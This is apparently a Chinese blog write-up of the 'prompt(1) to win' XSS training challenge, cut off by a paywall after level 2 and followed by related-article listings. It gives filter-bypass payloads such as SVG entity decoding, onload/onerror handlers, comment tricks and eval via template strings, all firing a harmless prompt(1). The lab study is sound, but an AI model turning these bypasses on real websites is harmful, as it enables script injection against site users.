prompt(1) to win -----XSS学习笔记

最新推荐文章于 2024-08-01 22:18:51 发布
最新推荐文章于 2024-08-01 22:18:51 发布
阅读量1w 收藏 10
点赞数 5
分类专栏: Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35078631/article/details/77073233
版权
本文是一篇关于XSS学习的笔记,记录了作者在一系列挑战中如何利用各种技巧插入prompt(1) 的过程。从基础的<>过滤到复杂的正则与长度限制,每个关卡都详细分析了解决方案,包括SVG标签、URL编码、注释符等绕过策略。
摘要由CSDN通过智能技术生成

一直不是很懂XSS,所以这里专门来学习一下下!记录做题的过程嗯。规则是当想办法嵌入prompt(1) 就算胜利了

第0关

什么过滤都没有,payload如下

"><script>prompt(1)</script><"

这里写图片描述

第1关—<> 过滤

function escape(input) {
   
    // tags stripping mechanism from ExtJS library
    // Ext.util.Format.stripTags
    var stripTagsRE = /<\/?[^>]+>/gi;
    input = input.replace(stripTagsRE, '');

    return '<article>' + input + '</article>';
}

发现是过滤了<内容>这个组合,通过实验发现可以用//注释绕过,相当于过滤了>,这里采用了payload

    <article><body/onload=prompt(1)//</article>

这里写图片描述

这样也是可以的 

<img src=1 onerror=prompt(1)//

第2关— (= 过滤

function escape(input) {
   
    //                      v-- frowny face
    input = input.replace(/[=(]/g, '');

    // ok seriously, disallows equal signs and open parenthesis
    return input;
}

很容易看出来,是过滤了(和=,但是怎么过滤很困惑,想过会不会是什么编码解析绕过它,但是没成功。参考了大牛的答案后恍然大悟,原来存在这么神器的标签
使用SVG标签,会提前将将XML实体解析再加入标签!然后我们只需要构造<svg><script>prompt&#x28;1)</script>

这里写图片描述

或者利用了 

<script>eval.call`${'prompt\x281)'}`</script>

调用了js中的eval函数,巧妙死了!

第3关—替换

function escape(input) {
最低0.47元/天 解锁文章
Assassin__is__me
关注
专栏目录
【ICLR 2023】Diffusion Models扩散模型和Prompt Learning提示学习prompt-to-prompt
沉迷单车的追风少年
10-16 4011
今年prompt learning提示学习和diffusion models扩散模型实在是太火了,最新的ICLR 2023的一项工作把两者结合了起来,取得了十分惊艳的效果!正好昨天代码刚刚开源,这篇博客就和大家一起解读一下原理与代码!
从System Prompt来看GPT-3.5到GPT-4的进化
herosunly的博客
05-23 3万+
本文主要介绍了从System Prompt来看GPT-3.5到GPT-4的进化之路,希望能对学习大模型的同学们有所帮助。 文章目录 1. 前言 2. System Prompt 2.1 GPT-3.5 2.2 GPT-4o 2.3 GPT-3.5到GPT-4的进化之路
prompt(1)to win靶场(1~9)
newlife1441的博客
08-02 558
呼叫提示符prompt(1)获胜,你应该在没有用户交互的情况下制作它。在完成每个关卡后,你的有效载荷将等待验证并测试最新版本,Firefox(最新版本)、ie10,虽然大多数级别都有所有浏览器解决方案,但有些可能没有。可以保证每个级别至少有两个浏览器的解决方案。最后但并非最不重要的是,有效载荷需要更少的角色,下面是靶场的网址http。...
Prompt(1)to win练习
and_then111的博客
11-11 1905
Prompt(1)to win练习关于Prompt(1) to winLevel 0Level 1Level 2Level 3Level 4Level 5Level 6Level 7Level 8Level 9Level ALevel BLevel CLevel DLevel ELevel FHidden Level -1Hidden Level -2Hidden Level -3Hidden L...
AI大模型之Prompt工程指南:什么是Prompt工程?Prompt工程的格式与要求
最新发布
老皮的博客
08-01 5545
Prompt是一种基于人工智能(AI)指令的技术,通过明确而具体的指导语言模型的输出。在提示词工程中,Prompt的定义涵盖了任务、指令和角色三个主要元素,以确保模型生成符合用户需求的文本。Prompt明确而简洁地陈述了用户要求模型生成的内容。这包括在特定应用场景中,用户希望模型完成的任务或生成的文本类型。模型在生成文本时应遵循的指令是Prompt中的关键要素之一。这些指令具体规定了模型生成文本的方式,通过清晰的语言来引导模型以获得所需的输出。Prompt中还包括模型在生成文本时应扮演的角色。
xss练习-prompt(1) to win
Ni9htMar3的博客
09-11 9721
链接地址: http://prompt.ml/0 规则1、成功执行prompt(1). 2、payload不需要用户交互 3、payload必须对下述浏览器有效: - Chrome(最新版) - Firefox(最新版) - IE10 及以上版本(或者IE10兼容模式)4、每个级别至少给出两种浏览器的答案 5、字符越少越好level 0function escape(input)
xss绕过:prompt(1)
Miracle_ze的博客
07-30 3190
xss绕过
XSS靶场(三)prompt to win
C_LCH_2000的博客
07-31 312
prompt to win 关卡详解
XSS线上靶场---prompt
qq_52016943的博客
07-30 1102
XSS prompt
ChatGPT和GPT-4带你选笔记本电脑
热门推荐
herosunly的博客
04-11 14万+
本文介绍核心内容为用好ChatGPT之准确分配角色,希望对学习和使用ChatGPT的同学们有所帮助。为了兼顾质量和速度,本专栏的更新频率为一周一到两更。 文章目录 1. 前言 2. 使用ChatGPT给出选择建议 3. 使用GPT-4给出选择建议
prompt(1) to win -xss学习
shinygod的博客
11-22 964
prompt(1) to win xss 学习
SQL Prompt (1).zip
10-25
sql prompt是数据库智能感知工具,直接安装即可使用,非常方便,我现在也用的这个版本
xss挑战赛小记 0x02(prompt(1))
weixin_30618985的博客
09-06 269
0x0O 上次搜xss挑战赛的时候 还找到了一个看上去难度更高的挑战赛 今天做了一下 学到了很多新东西 这个挑战赛能够在页面成功prompt(1)就算过关了 挑战地址 http://prompt.ml/0 0x00 为了排版把第一个改成0x0O了hhh 一开始我是想" onmouseover="prompt(1)这样的 但是这个比赛要在没有用户交互的情况下运行 ...
【20171025中】alert(1) to win 脚本渲染自建
weixin_30896763的博客
10-25 125
游戏误人生,一下午玩了将近四个小时的三国杀,后悔不已,然后重新拾起xsschallenge,突发奇想,自己构建渲染后的html。 从最简单的开始。 自动检测html: <!DOCTYPE html> <html> <head><meta http-equiv="Content-Type" content="...
prompt(1) to win writeup
code_lab
04-05 2226
0没有任何过滤"><script>prompt(1)</script> 或者 "><svg/onload=prompt(1)>1过滤了大于号>,采用注释符//绕过aa<svg/onload=prompt(1)//2过滤了左括号(,使用<svg>标签绕过。在SVG向量里面的<script>元素(或者其他CDATA元素 ),会先进行xml解析。因此((十六进制)或者((十进制)或者
XSS练习-prompt(1) to win
weixin_30387799的博客
05-17 516
第零关 Text Viewer function escape(input) { // warm up // script should be executed without user interaction return '<input type="text" value="' + input + '">'; } Answer 对输入的文本没有进行过滤措施直...
alert(1) to win部分解题
weixin_30553777的博客
08-03 284
XSS在线习题分析 (https://alf.nu/alert1) 1. Warmup function escape(s) { return '<script>console.log("'+s+'");</script>'; } 没有进行过滤,只需要语句闭合就行。闭合语句思路:把console.log() 单独作为一个语句,alert(1)单独作为一个语句,包含...
prompt用法
CheriYu的博客
08-11 1万+
function promptDemo(){ var score=prompt("请输入分数"); if(score>90){ document.write("哇塞。学霸"); } else if(80<score){ document.write("80---90"); }
js-prompt()
dick4123632的博客
09-15 212
var age=prompt("请输入您的年龄");  if(age<18){ alert("你未成年");   }else{   alert("你成年"); } 案例: <!DOCTYPE html><html><head lang="en"> <meta charset="UTF-8"> <t...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值